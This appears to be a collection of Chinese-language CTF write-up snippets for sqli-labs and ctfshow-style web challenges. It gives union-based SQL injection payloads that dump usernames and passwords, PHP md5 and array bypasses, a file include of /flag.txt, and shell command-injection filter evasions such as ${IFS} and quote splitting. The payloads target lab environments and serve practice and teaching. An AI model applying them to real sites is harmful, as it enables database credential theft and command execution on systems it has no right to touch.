less-1
看报错可知,这是闭合单引号。
1
2
3
4
?id=1'order by 3 -- - #确定那个字段有回显
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- - #查询表名
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- - #查询列名
?id=-1'union select 1,2,group_concat(username,'~',password) from users -- - #查询当前数据库user表里面的username和password。
web101 12当新建ReflectionClass类并传入PHP代码时,会返回代码的运行结果,可以通过echo显示即使传入了空的括号,代码依旧可以运行,且error_reporting(0)的存在阻止了报错 v1必须是数字,v2可...
web97
要求POST传参,a不能等于b,但是a和b的md5值要相同,但是md5这个函数呢有个漏洞,传入的参数为数组的时候会发生错误,并返回NULL。
1
a[]=123&b[]=1234
web89
用数组绕过就行。
payload:
1
?num[]=a;
web87
谈一谈php://filter的妙用
web69和web68一样。
payload:
1
c=include("/flag.txt");
[SWPUCTF 2021 新生赛]我的银行卡密码
压缩包有密码,而且是6位数。用ARCHPR破解,密码是768521。
web57
题目显示flag在36.php中,而且给出cat和php了,只要想办法构造出36就可以了。
$(())是做运算,$((${_}))=0,所以只要拼接除-36之后取反就行
payload:
1
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
web53
多过滤了一个wget,多添加了一个回显。
payload:
1
?c=ca''t${IFS}fla''g.php
